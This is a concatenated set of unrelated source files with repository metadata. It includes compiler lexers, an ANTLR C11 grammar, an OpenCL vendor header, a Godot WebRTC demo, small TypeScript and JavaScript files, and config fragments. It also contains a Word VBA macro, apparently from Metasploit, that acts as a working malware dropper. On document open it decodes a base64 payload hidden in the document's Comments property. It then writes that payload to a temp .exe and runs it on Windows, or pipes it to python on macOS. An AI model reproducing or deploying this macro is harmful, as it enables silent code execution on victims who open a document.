/* Report a formatted error on stderr, prefixed with the current input
 * line number when one is known, guarantee a trailing newline, and
 * bump the global error counter. */
void yyerror(char *fmt, ...) {
    va_list args;

    if (yylineno > 0)
        fprintf(stderr, "line %d: ", yylineno);
    va_start(args, fmt);
    vfprintf(stderr, fmt, args);
    va_end(args);
    if (fmt[strlen(fmt) - 1] != '\n')
        fprintf(stderr, "\n");
    errcnt++;
}
/* Lexer for the lburg grammar.  Returns the next token code and stores
 * semantic values in yylval.  While `code` is non-zero, the remainder of
 * the current line is returned verbatim as a CODE token (the cost
 * expression that follows an assembler template). */
int yylex(void) {
    int c;

    if (code) {
        char *p;
        bp += strspn(bp, " \t\f");
        p = strchr(bp, '\n');
        if (p == NULL)
            p = strchr(bp, '\0');  /* FIX: was strchr(bp, '\n') again, leaving p NULL;
                                      fall back to end of buffer like the TEMPLATE case */
        while (p > bp && isspace(p[-1]))
            p--;
        yylval.string = alloc(p - bp + 1);
        strncpy(yylval.string, bp, p - bp);
        yylval.string[p - bp] = 0;
        bp = p;
        code--;
        return CODE;
    }
    while ((c = get()) != EOF) {
        switch (c) {
        case ' ': case '\f': case '\t':
            continue;
        case '\n':
        case '(': case ')': case ',':
        case ':': case '=':
            return c;
        }
        if (c == '%' && *bp == '%') {
            bp++;
            /* second %% ends the rules section; report only the first */
            return ppercent++ ? 0 : PPERCENT;
        } else if (c == '%' && strncmp(bp, "term", 4) == 0
        && isspace(bp[4])) {
            bp += 4;
            return TERMINAL;
        } else if (c == '%' && strncmp(bp, "start", 5) == 0
        && isspace(bp[5])) {
            bp += 5;
            return START;
        } else if (c == '"') {
            /* assembler template: everything up to the closing quote */
            char *p = strchr(bp, '"');
            if (p == NULL) {
                yyerror("missing \" in assembler template\n");
                p = strchr(bp, '\n');
                if (p == NULL)
                    p = strchr(bp, '\0');
            }
            assert(p);
            yylval.string = alloc(p - bp + 1);
            strncpy(yylval.string, bp, p - bp);
            yylval.string[p - bp] = 0;
            bp = *p == '"' ? p + 1 : p;
            code++;  /* next call returns the rest of the line as CODE */
            return TEMPLATE;
        } else if (isdigit(c)) {
            int n = 0;
            do {
                int d = c - '0';
                if (n > (INT_MAX - d)/10)  /* overflow guard */
                    yyerror("integer greater than %d\n", INT_MAX);
                else
                    n = 10*n + d;
                c = get();
            } while (c != EOF && isdigit(c));
            bp--;  /* push back the first non-digit */
            yylval.n = n;
            return INT;
        } else if (isalpha(c)) {
            char *p = bp - 1;
            while (isalpha(*bp) || isdigit(*bp) || *bp == '_')
                bp++;
            yylval.string = alloc(bp - p + 1);
            strncpy(yylval.string, p, bp - p);
            yylval.string[bp - p] = 0;
            return ID;
        } else if (isprint(c))
            yyerror("invalid character `%c'\n", c);
        else
            yyerror("invalid character `\\%03o'\n", (unsigned char)c);
    }
    return 0;
}
/* yywarn - print a warning prefixed with the current input line number.
 * Unlike yyerror, it does not bump errcnt and does not force a newline. */
void yywarn(char *fmt, ...) {
	va_list args;

	va_start(args, fmt);
	if (yylineno > 0)
		fprintf(stderr, "line %d: ", yylineno);
	fputs("warning: ", stderr);
	vfprintf(stderr, fmt, args);
	va_end(args);
}
| Yacc | 4 | arbaazkhan2/act_unreal | engine/code/tools/lcc/lburg/gram.y | [
"CC-BY-4.0"
] |
/*
[The "BSD licence"]
Copyright (c) 2013 Sam Harwell
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* Partially extracted from the original C.g4.
- added recognition of $ as a NonDigit in Identifier
- better line continuation handling
- fixed bugs in pre-processor directives
Copyright (c) 2020 International Business Machines Corporation
Prepared by: Geert Janssen <geert@us.ibm.com>
*/
/** C 2011 grammar built from the C11 Spec */
lexer grammar C11_lexer_common; // always imported; name does not really matter
// (GCC) Extension keywords:
Extension__ : '__extension__';
Builtin_va_arg: '__builtin_va_arg';
Builtin_offsetof: '__builtin_offsetof';
M128: '__m128';
M128d: '__m128d';
M128i: '__m128i';
Typeof__: '__typeof__';
Inline__: '__inline__';
Stdcall: '__stdcall';
Declspec: '__declspec';
Attribute__: '__attribute__';
Asm: '__asm';
Asm__: '__asm__';
Volatile__: '__volatile__';
//A.1.2 Keywords
AUTO: 'auto';
BREAK: 'break';
CASE: 'case';
CHAR: 'char';
CONST: 'const';
CONTINUE: 'continue';
DEFAULT: 'default';
DO: 'do';
DOUBLE: 'double';
ELSE: 'else';
ENUM: 'enum';
EXTERN: 'extern';
FLOAT: 'float';
FOR: 'for';
GOTO: 'goto';
IF: 'if';
INLINE: 'inline';
INT: 'int';
LONG: 'long';
REGISTER: 'register';
RESTRICT: 'restrict';
RETURN: 'return';
SHORT: 'short';
SIGNED: 'signed';
SIZEOF: 'sizeof';
STATIC: 'static';
STRUCT: 'struct';
SWITCH: 'switch';
TYPEDEF: 'typedef';
UNION: 'union';
UNSIGNED: 'unsigned';
VOID: 'void';
VOLATILE: 'volatile';
WHILE: 'while';
ALIGNAS: '_Alignas';
ALIGNOF: '_Alignof';
ATOMIC: '_Atomic';
BOOL: '_Bool';
COMPLEX: '_Complex';
GENERIC: '_Generic';
IMAGINARY: '_Imaginary';
NORETURN: '_Noreturn';
STATIC_ASSERT: '_Static_assert';
THREAD_LOCAL: '_Thread_local';
//A.1.3 Identifiers
Identifier
: IdentifierNondigit
( IdentifierNondigit
| Digit
)*
;
fragment
IdentifierNondigit
: Nondigit
| UniversalCharacterName
//| // other implementation-defined characters...
;
// GJ20: extend to allow $
fragment
Nondigit
: [a-zA-Z_$]
;
fragment
Digit
: [0-9]
;
fragment
UniversalCharacterName
: '\\u' HexQuad
| '\\U' HexQuad HexQuad
;
fragment
HexQuad
: HexadecimalDigit HexadecimalDigit HexadecimalDigit HexadecimalDigit
;
//A.1.5 Constants
// rule for Constant moved to parser; constituents unfragmented.
/*
Constant
: IntegerConstant
| FloatingConstant
//| EnumerationConstant
| CharacterConstant
;
*/
IntegerConstant
: DecimalConstant IntegerSuffix?
| OctalConstant IntegerSuffix?
| HexadecimalConstant IntegerSuffix?
| BinaryConstant
;
fragment
BinaryConstant
: '0' [bB] [0-1]+
;
fragment
DecimalConstant
: NonzeroDigit Digit*
;
fragment
OctalConstant
: '0' OctalDigit*
;
fragment
HexadecimalConstant
: HexadecimalPrefix HexadecimalDigit+
;
fragment
HexadecimalPrefix
: '0' [xX]
;
fragment
NonzeroDigit
: [1-9]
;
fragment
OctalDigit
: [0-7]
;
fragment
HexadecimalDigit
: [0-9a-fA-F]
;
fragment
IntegerSuffix
: UnsignedSuffix LongSuffix?
| UnsignedSuffix LongLongSuffix
| LongSuffix UnsignedSuffix?
| LongLongSuffix UnsignedSuffix?
;
fragment
UnsignedSuffix
: [uU]
;
fragment
LongSuffix
: [lL]
;
fragment
LongLongSuffix
: 'll' | 'LL'
;
FloatingConstant
: DecimalFloatingConstant
| HexadecimalFloatingConstant
;
fragment
DecimalFloatingConstant
: FractionalConstant ExponentPart? FloatingSuffix?
| DigitSequence ExponentPart FloatingSuffix?
;
fragment
HexadecimalFloatingConstant
: HexadecimalPrefix HexadecimalFractionalConstant BinaryExponentPart FloatingSuffix?
| HexadecimalPrefix HexadecimalDigitSequence BinaryExponentPart FloatingSuffix?
;
fragment
FractionalConstant
: DigitSequence? '.' DigitSequence
| DigitSequence '.'
;
fragment
ExponentPart
: 'e' Sign? DigitSequence
| 'E' Sign? DigitSequence
;
fragment
Sign
: '+' | '-'
;
DigitSequence
: Digit+
;
fragment
HexadecimalFractionalConstant
: HexadecimalDigitSequence? '.' HexadecimalDigitSequence
| HexadecimalDigitSequence '.'
;
fragment
BinaryExponentPart
: 'p' Sign? DigitSequence
| 'P' Sign? DigitSequence
;
fragment
HexadecimalDigitSequence
: HexadecimalDigit+
;
fragment
FloatingSuffix
: 'f' | 'l' | 'F' | 'L'
;
CharacterConstant
: '\'' CCharSequence '\''
| 'L\'' CCharSequence '\''
| 'u\'' CCharSequence '\''
| 'U\'' CCharSequence '\''
;
fragment
CCharSequence
: CChar+
;
fragment
CChar
: ~['\\\r\n] // GJ20: approximation
| EscapeSequence
;
fragment
EscapeSequence
: SimpleEscapeSequence
| OctalEscapeSequence
| HexadecimalEscapeSequence
| UniversalCharacterName
;
// GJ20: allow any character to be escaped
fragment
SimpleEscapeSequence
// : '\\' ['"?abfnrtv\\]
: '\\' .
;
fragment
OctalEscapeSequence
: '\\' OctalDigit
| '\\' OctalDigit OctalDigit
| '\\' OctalDigit OctalDigit OctalDigit
;
fragment
HexadecimalEscapeSequence
: '\\x' HexadecimalDigit+
;
//A.1.6
StringLiteral
: EncodingPrefix? '"' SCharSequence? '"'
;
fragment
EncodingPrefix
: 'u8'
| 'u'
| 'U'
| 'L'
;
fragment
SCharSequence
: SChar+
;
// GJ20: Handling of \ Newline is incorrect, but works somewhat.
fragment
SChar
: ~["\\\r\n] // GJ20: approximation
| EscapeSequence
| EscapeNewline
;
//A.1.7 Punctuators
// Operator and punctuation:
// Enclosing brackets:
LeftParen: '(';
RightParen: ')';
LeftBracket: '[';
RightBracket: ']';
LeftBrace: '{';
RightBrace: '}';
// Preprocessor-related symbols:
HashMark: '#';
HashMarkHashMark: '##';
// Alternatives (ISO C digraph punctuators):
LessColon: '<:'; // alt [
ColonGreater: ':>'; // alt ]
LessPercent: '<%'; // alt {
// NOTE(review): the next two token names misspell "Percent" as "Precent".
// Renaming would break any parser grammar that imports this lexer by token
// name, so the misspelled identifiers are deliberately kept.
PrecentGreater: '%>'; // alt }
PrecentColon: '%:'; // alt #
PercentColonPercentColon: '%:%:'; // alt ##
// Punctuators:
Semi: ';';
Colon: ':';
Ellipsis: '...';
Comma: ',';
Dot: '.';
// Operators:
Question: '?';
Plus: '+';
Minus: '-';
Star: '*';
Div: '/';
Mod: '%';
Caret: '^';
And: '&';
Or: '|';
Tilde: '~';
Not: '!';
Assign: '=';
Less: '<';
Greater: '>';
PlusAssign: '+=';
MinusAssign: '-=';
StarAssign: '*=';
DivAssign: '/=';
ModAssign: '%=';
XorAssign: '^=';
AndAssign: '&=';
OrAssign: '|=';
LeftShift: '<<';
RightShift: '>>';
RightShiftAssign: '>>=';
LeftShiftAssign: '<<=';
Equal: '==';
NotEqual: '!=';
LessEqual: '<=';
GreaterEqual: '>=';
AndAnd: '&&';
OrOr: '||';
PlusPlus: '++';
MinusMinus: '--';
Arrow: '->';
// GJ20: completely bogus; will skip everything till next #
/*
ComplexDefine
: '#' Whitespace? 'define' ~[#]*
-> skip
;
*/
// GJ20: covered by Directive; see below.
/*
IncludeDirective
: '#' Whitespace? 'include' Whitespace? (('"' ~[\n"]+ '"') | ('<' ~[\n>]+ '>' ))
-> skip
;
*/
// ignore the following asm blocks:
/*
asm
{
mfspr x, 286;
}
*/
AsmBlock
: 'asm' ~'{'* '{' ~'}'* '}'
-> skip
;
// GJ20: covered by Directive; see below.
// ignore the lines generated by c preprocessor
// sample line: '#line 1 "/home/dm/files/dk1.h" 1'
/*
LineAfterPreprocessing
: '#line' Whitespace* ~[\r\n]*
-> skip
;
*/
// GJ20: covered by Directive; see below.
/*
LineDirective
: '#' Whitespace? DecimalConstant Whitespace? StringLiteral ~[\r\n]*
-> skip
;
*/
// GJ20: covered by Directive; see below.
/*
PragmaDirective
: '#' Whitespace? 'pragma' Whitespace ~[\r\n]*
-> skip
;
*/
// GJ20: every preprocessor directive is treated a line comment.
Directive:
'#' (~[\\\r\n]* EscapeNewline)* ~[\r\n]* -> channel(HIDDEN);
// GJ20: added vertical tab \v (^K) and formfeed \f (^L)
Whitespace
: [ \t\u000B\f]+
-> skip
;
Newline
: ( '\r' '\n'?
| '\n'
)
-> skip
;
// GJ20: this will create logical lines.
EscapeNewline
: '\\' Newline
-> skip
;
// GJ20: anticipate \ Newline
BlockComment
: '/*' .*? '*/'
-> channel(HIDDEN)
;
// GJ20: anticipate \ Newline
LineComment
: '//' (~[\\\r\n]* EscapeNewline)* ~[\r\n]*
-> channel(HIDDEN)
;
| ANTLR | 4 | yingkitw/Project_CodeNet | tools/spt-generator/src/com/ibm/ai4code/parser/c_multi/C11_lexer_common.g4 | [
"Apache-2.0"
] |
/* Copyright (c) 2009-2017 Qualcomm Technologies, Inc. All Rights Reserved.
* Qualcomm Technologies Proprietary and Confidential.
*/
#ifndef __OPENCL_CL_EXT_QCOM_H
#define __OPENCL_CL_EXT_QCOM_H
// Needed by cl_khr_egl_event extension
#include <EGL/egl.h>
#include <EGL/eglext.h>
#include <CL/cl_ext.h>
#ifdef __cplusplus
extern "C" {
#endif
/************************************
* cl_qcom_create_buffer_from_image *
************************************/
#define CL_BUFFER_FROM_IMAGE_ROW_PITCH_QCOM 0x40C0
#define CL_BUFFER_FROM_IMAGE_SLICE_PITCH_QCOM 0x40C1
extern CL_API_ENTRY cl_mem CL_API_CALL
clCreateBufferFromImageQCOM(cl_mem image,
cl_mem_flags flags,
cl_int *errcode_ret);
/************************************
* cl_qcom_limited_printf extension *
************************************/
/* Builtin printf function buffer size in bytes. */
#define CL_DEVICE_PRINTF_BUFFER_SIZE_QCOM 0x1049
/*************************************
* cl_qcom_extended_images extension *
*************************************/
#define CL_CONTEXT_ENABLE_EXTENDED_IMAGES_QCOM 0x40AA
#define CL_DEVICE_EXTENDED_IMAGE2D_MAX_WIDTH_QCOM 0x40AB
#define CL_DEVICE_EXTENDED_IMAGE2D_MAX_HEIGHT_QCOM 0x40AC
#define CL_DEVICE_EXTENDED_IMAGE3D_MAX_WIDTH_QCOM 0x40AD
#define CL_DEVICE_EXTENDED_IMAGE3D_MAX_HEIGHT_QCOM 0x40AE
#define CL_DEVICE_EXTENDED_IMAGE3D_MAX_DEPTH_QCOM 0x40AF
/*************************************
* cl_qcom_perf_hint extension *
*************************************/
typedef cl_uint cl_perf_hint;
#define CL_CONTEXT_PERF_HINT_QCOM 0x40C2
/*cl_perf_hint*/
#define CL_PERF_HINT_HIGH_QCOM 0x40C3
#define CL_PERF_HINT_NORMAL_QCOM 0x40C4
#define CL_PERF_HINT_LOW_QCOM 0x40C5
extern CL_API_ENTRY cl_int CL_API_CALL
clSetPerfHintQCOM(cl_context context,
cl_perf_hint perf_hint);
// This extension is published at Khronos, so its definitions are made in cl_ext.h.
// This duplication is for backward compatibility.
#ifndef CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM
/*********************************
* cl_qcom_android_native_buffer_host_ptr extension
*********************************/
#define CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM 0x40C6
typedef struct _cl_mem_android_native_buffer_host_ptr
{
// Type of external memory allocation.
// Must be CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM for Android native buffers.
cl_mem_ext_host_ptr ext_host_ptr;
// Virtual pointer to the android native buffer
void* anb_ptr;
} cl_mem_android_native_buffer_host_ptr;
#endif //#ifndef CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM
/***********************************
* cl_img_egl_image extension *
************************************/
typedef void* CLeglImageIMG;
typedef void* CLeglDisplayIMG;
extern CL_API_ENTRY cl_mem CL_API_CALL
clCreateFromEGLImageIMG(cl_context context,
cl_mem_flags flags,
CLeglImageIMG image,
CLeglDisplayIMG display,
cl_int *errcode_ret);
/*********************************
* cl_qcom_other_image extension
*********************************/
// Extended flag for creating/querying QCOM non-standard images
#define CL_MEM_OTHER_IMAGE_QCOM (1<<25)
// cl_channel_type
#define CL_QCOM_UNORM_MIPI10 0x4159
#define CL_QCOM_UNORM_MIPI12 0x415A
#define CL_QCOM_UNSIGNED_MIPI10 0x415B
#define CL_QCOM_UNSIGNED_MIPI12 0x415C
#define CL_QCOM_UNORM_INT10 0x415D
#define CL_QCOM_UNORM_INT12 0x415E
#define CL_QCOM_UNSIGNED_INT16 0x415F
// cl_channel_order
// Dedicate 0x4130-0x415F range for QCOM extended image formats
// 0x4130 - 0x4132 range is assigned to pixel-oriented compressed format
#define CL_QCOM_BAYER 0x414E
#define CL_QCOM_NV12 0x4133
#define CL_QCOM_NV12_Y 0x4134
#define CL_QCOM_NV12_UV 0x4135
#define CL_QCOM_TILED_NV12 0x4136
#define CL_QCOM_TILED_NV12_Y 0x4137
#define CL_QCOM_TILED_NV12_UV 0x4138
#define CL_QCOM_P010 0x413C
#define CL_QCOM_P010_Y 0x413D
#define CL_QCOM_P010_UV 0x413E
#define CL_QCOM_TILED_P010 0x413F
#define CL_QCOM_TILED_P010_Y 0x4140
#define CL_QCOM_TILED_P010_UV 0x4141
#define CL_QCOM_TP10 0x4145
#define CL_QCOM_TP10_Y 0x4146
#define CL_QCOM_TP10_UV 0x4147
#define CL_QCOM_TILED_TP10 0x4148
#define CL_QCOM_TILED_TP10_Y 0x4149
#define CL_QCOM_TILED_TP10_UV 0x414A
/*********************************
* cl_qcom_compressed_image extension
*********************************/
// Extended flag for creating/querying QCOM non-planar compressed images
#define CL_MEM_COMPRESSED_IMAGE_QCOM (1<<27)
// Extended image format
// cl_channel_order
#define CL_QCOM_COMPRESSED_RGBA 0x4130
#define CL_QCOM_COMPRESSED_RGBx 0x4131
#define CL_QCOM_COMPRESSED_NV12_Y 0x413A
#define CL_QCOM_COMPRESSED_NV12_UV 0x413B
#define CL_QCOM_COMPRESSED_P010 0x4142
#define CL_QCOM_COMPRESSED_P010_Y 0x4143
#define CL_QCOM_COMPRESSED_P010_UV 0x4144
#define CL_QCOM_COMPRESSED_TP10 0x414B
#define CL_QCOM_COMPRESSED_TP10_Y 0x414C
#define CL_QCOM_COMPRESSED_TP10_UV 0x414D
#define CL_QCOM_COMPRESSED_NV12_4R 0x414F
#define CL_QCOM_COMPRESSED_NV12_4R_Y 0x4150
#define CL_QCOM_COMPRESSED_NV12_4R_UV 0x4151
/*********************************
* cl_qcom_compressed_yuv_image_read extension
*********************************/
// Extended flag for creating/querying QCOM compressed images
#define CL_MEM_COMPRESSED_YUV_IMAGE_QCOM (1<<28)
// Extended image format
#define CL_QCOM_COMPRESSED_NV12 0x10C4
// Extended flag for setting ION buffer allocation type
#define CL_MEM_ION_HOST_PTR_COMPRESSED_YUV_QCOM 0x40CD
#define CL_MEM_ION_HOST_PTR_PROTECTED_COMPRESSED_YUV_QCOM 0x40CE
/*********************************
* cl_qcom_accelerated_image_ops
*********************************/
#define CL_MEM_OBJECT_WEIGHT_IMAGE_QCOM 0x4110
#define CL_DEVICE_HOF_MAX_NUM_PHASES_QCOM 0x4111
#define CL_DEVICE_HOF_MAX_FILTER_SIZE_X_QCOM 0x4112
#define CL_DEVICE_HOF_MAX_FILTER_SIZE_Y_QCOM 0x4113
#define CL_DEVICE_BLOCK_MATCHING_MAX_REGION_SIZE_X_QCOM 0x4114
#define CL_DEVICE_BLOCK_MATCHING_MAX_REGION_SIZE_Y_QCOM 0x4115
//Extended flag for specifying weight image type
#define CL_WEIGHT_IMAGE_SEPARABLE_QCOM (1<<0)
// Box Filter
typedef struct _cl_box_filter_size_qcom
{
// Width of box filter on X direction.
float box_filter_width;
// Height of box filter on Y direction.
float box_filter_height;
} cl_box_filter_size_qcom;
// HOF Weight Image Desc
typedef struct _cl_weight_desc_qcom
{
/** Coordinate of the "center" point of the weight image,
based on the weight image's top-left corner as the origin. */
size_t center_coord_x;
size_t center_coord_y;
cl_bitfield flags;
} cl_weight_desc_qcom;
typedef struct _cl_weight_image_desc_qcom
{
cl_image_desc image_desc;
cl_weight_desc_qcom weight_desc;
} cl_weight_image_desc_qcom;
/*************************************
* cl_qcom_protected_context extension *
*************************************/
#define CL_CONTEXT_PROTECTED_QCOM 0x40C7
#define CL_MEM_ION_HOST_PTR_PROTECTED_QCOM 0x40C8
/*************************************
* cl_qcom_priority_hint extension *
*************************************/
#define CL_PRIORITY_HINT_NONE_QCOM 0
typedef cl_uint cl_priority_hint;
#define CL_CONTEXT_PRIORITY_HINT_QCOM 0x40C9
/*cl_priority_hint*/
#define CL_PRIORITY_HINT_HIGH_QCOM 0x40CA
#define CL_PRIORITY_HINT_NORMAL_QCOM 0x40CB
#define CL_PRIORITY_HINT_LOW_QCOM 0x40CC
#ifdef __cplusplus
}
#endif
#endif /* __OPENCL_CL_EXT_QCOM_H */
| C | 2 | wolterhv/openpilot | phonelibs/opencl/include/CL/cl_ext_qcom.h | [
"MIT"
] |
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
system ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
' Base64Decode: decodes a base-64 encoded string into raw bytes held in a
' VBA string. Raises error 1 for a length that is not a multiple of 4 and
' error 2 for a character outside the base-64 alphabet.
Function Base64Decode(ByVal base64String)
    'rfc1521
    '1999 Antonin Foller, Motobit Software, http://Motobit.cz
    Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    Dim dataLength, sOut, groupBegin
    ' Strip whitespace that encoders commonly insert.
    base64String = Replace(base64String, vbCrLf, "")
    base64String = Replace(base64String, vbTab, "")
    base64String = Replace(base64String, " ", "")
    ' Valid base-64 input always comes in 4-character groups.
    dataLength = Len(base64String)
    If dataLength Mod 4 <> 0 Then
        Err.Raise 1, "Base64Decode", "Bad Base64 string."
        Exit Function
    End If
    ' Each 4-character group decodes to up to 3 bytes; "=" padding reduces it.
    For groupBegin = 1 To dataLength Step 4
        Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
        numDataBytes = 3
        nGroup = 0
        For CharCounter = 0 To 3
            thisChar = Mid(base64String, groupBegin + CharCounter, 1)
            If thisChar = "=" Then
                ' Padding: one fewer output byte, contributes zero bits.
                numDataBytes = numDataBytes - 1
                thisData = 0
            Else
                ' Alphabet position (0-63); InStr returns 0 -> -1 when absent.
                thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
            End If
            If thisData = -1 Then
                Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                Exit Function
            End If
            nGroup = 64 * nGroup + thisData
        Next
        ' Render the 24-bit group as six hex digits, then split into 3 bytes.
        nGroup = Hex(nGroup)
        nGroup = String(6 - Len(nGroup), "0") & nGroup
        pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
            Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
            Chr(CByte("&H" & Mid(nGroup, 5, 2)))
        ' Keep only the bytes that were actually encoded (drop padding bytes).
        sOut = sOut & Left(pOut, numDataBytes)
    Next
    Base64Decode = sOut
End Function
| Visual Basic | 4 | OsmanDere/metasploit-framework | external/source/exploits/office_word_macro/macro.vba | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
extends Node
# Main scene.
# Create the two peers.
var p1 = WebRTCPeerConnection.new()
var p2 = WebRTCPeerConnection.new()
var ch1 = p1.create_data_channel("chat", {"id": 1, "negotiated": true})
var ch2 = p2.create_data_channel("chat", {"id": 1, "negotiated": true})
func _ready():
	# NOTE(review): removed a stray debug statement that created (and printed)
	# a second negotiated data channel with the same id (1) on p1 — both
	# channels are already created exactly once when the script loads above.
	# Connect P1 session created to itself to set local description.
	p1.connect("session_description_created", p1, "set_local_description")
	# Connect P1 session and ICE created to p2 set remote description and candidates.
	p1.connect("session_description_created", p2, "set_remote_description")
	p1.connect("ice_candidate_created", p2, "add_ice_candidate")
	# Same for P2.
	p2.connect("session_description_created", p2, "set_local_description")
	p2.connect("session_description_created", p1, "set_remote_description")
	p2.connect("ice_candidate_created", p1, "add_ice_candidate")
	# Let P1 create the offer.
	p1.create_offer()
	# Wait a second and send message from P1.
	yield(get_tree().create_timer(1), "timeout")
	ch1.put_packet("Hi from P1".to_utf8())
	# Wait a second and send message from P2.
	yield(get_tree().create_timer(1), "timeout")
	ch2.put_packet("Hi from P2".to_utf8())
func _process(delta):
	# Pump both peer connections every frame so signals and channel data flow.
	p1.poll()
	p2.poll()
	# Once a channel is open, drain and print any received chat packets.
	if ch1.get_ready_state() == ch1.STATE_OPEN and ch1.get_available_packet_count() > 0:
		print("P1 received: ", ch1.get_packet().get_string_from_utf8())
	if ch2.get_ready_state() == ch2.STATE_OPEN and ch2.get_available_packet_count() > 0:
		print("P2 received: ", ch2.get_packet().get_string_from_utf8())
| GDScript | 4 | jonbonazza/godot-demo-projects | networking/webrtc_minimal/minimal.gd | [
"MIT"
] |
var x = 1;
var x = 2;
function f() {
var y = 1;
var y = 2;
}
function f2() {
var z = 3;
var z = "";
} | TypeScript | 2 | nilamjadhav/TypeScript | tests/cases/compiler/duplicateLocalVariable3.ts | [
"Apache-2.0"
] |
// @flow
// Pulled from react-compat
// https://github.com/developit/preact-compat/blob/7c5de00e7c85e2ffd011bf3af02899b63f699d3a/src/index.js#L349
export default function shallowDiffers(prev: Object, next: Object): boolean {
for (let attribute in prev) {
if (!(attribute in next)) {
return true;
}
}
for (let attribute in next) {
if (prev[attribute] !== next[attribute]) {
return true;
}
}
return false;
}
| JavaScript | 3 | vegYY/react | packages/react-devtools-shared/src/node_modules/react-window/src/shallowDiffers.js | [
"MIT"
] |
<#ftl output_format="plainText">
${msg("emailTestBody", realmName)} | FreeMarker | 2 | rmartinc/keycloak | themes/src/main/resources/theme/base/email/text/email-test.ftl | [
"Apache-2.0"
] |
plz foo with {'Content-Type':'text/plain','Accept':'en-US'}
| Dogescript | 0 | erinkeith/dogescript | test/spec/plz/with-json-multi-props/source.djs | [
"MIT"
] |
<nav class="main-header navbar navbar-expand navbar-white navbar-light">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" data-widget="pushmenu" href="#"><i class="fas fa-bars"></i></a>
</li>
<li class="nav-item d-none d-sm-inline-block">
<a href="https://github.com/phalcon/phalcon-devtools/issues" class="nav-link text-primary" target="_blank">
<i class="fas fa-exclamation-triangle"></i>
Did something go wrong? Try the Github Issues.
</a>
</li>
</ul>
</nav>
| Volt | 3 | PSD-Company/phalcon-devtools-docker | src/Web/Tools/Views/partials/header.volt | [
"BSD-3-Clause"
] |
.. bpo: 28147
.. date: 9795
.. nonce: CnK_xf
.. release date: 2016-12-16
.. section: Core and Builtins
Fix a memory leak in split-table dictionaries: setattr() must not convert
combined table into split table. Patch written by INADA Naoki.
..
.. bpo: 28990
.. date: 9794
.. nonce: m8xRMJ
.. section: Core and Builtins
Fix asyncio SSL hanging if connection is closed before handshake is
completed. (Patch by HoHo-Ho)
..
.. bpo: 28770
.. date: 9793
.. nonce: N9GQsz
.. section: Tools/Demos
Fix python-gdb.py for fastcalls.
..
.. bpo: 28896
.. date: 9792
.. nonce: ymAbmH
.. section: Windows
Deprecate WindowsRegistryFinder.
..
.. bpo: 28898
.. date: 9791
.. nonce: YGUd_i
.. section: Build
Prevent gdb build errors due to HAVE_LONG_LONG redefinition.
| reStructuredText | 0 | shawwn/cpython | Misc/NEWS.d/3.6.0rc2.rst | [
"0BSD"
] |
/-
Copyright (c) 2016 Microsoft Corporation. All rights reserved.
Released under Apache 2.0 license as described in the file LICENSE.
Authors: Sebastian Ullrich
-/
prelude
import init.meta.tactic init.meta.rb_map init.meta.has_reflect init.meta.lean.parser
meta constant attribute.get_instances : name → tactic (list name)
meta constant attribute.fingerprint : name → tactic nat
meta structure user_attribute_cache_cfg (cache_ty : Type) :=
(mk_cache : list name → tactic cache_ty)
(dependencies : list name)
meta def user_attribute.dflt_cache_cfg : tactic unit :=
tactic.exact `(⟨λ _, pure (), []⟩ : user_attribute_cache_cfg unit)
meta def user_attribute.dflt_parser : tactic unit :=
tactic.exact `(pure () : lean.parser unit)
meta structure user_attribute (cache_ty : Type := unit) (param_ty : Type := unit) :=
(name : name)
(descr : string)
/- Optional handler that will be called after the attribute has been applied to a declaration.
Failing the tactic will fail the entire `attribute/def/...` command, i.e. the attribute will
not be applied after all.
Declaring an `after_set` handler without a `before_unset` handler will make the attribute
non-removable. -/
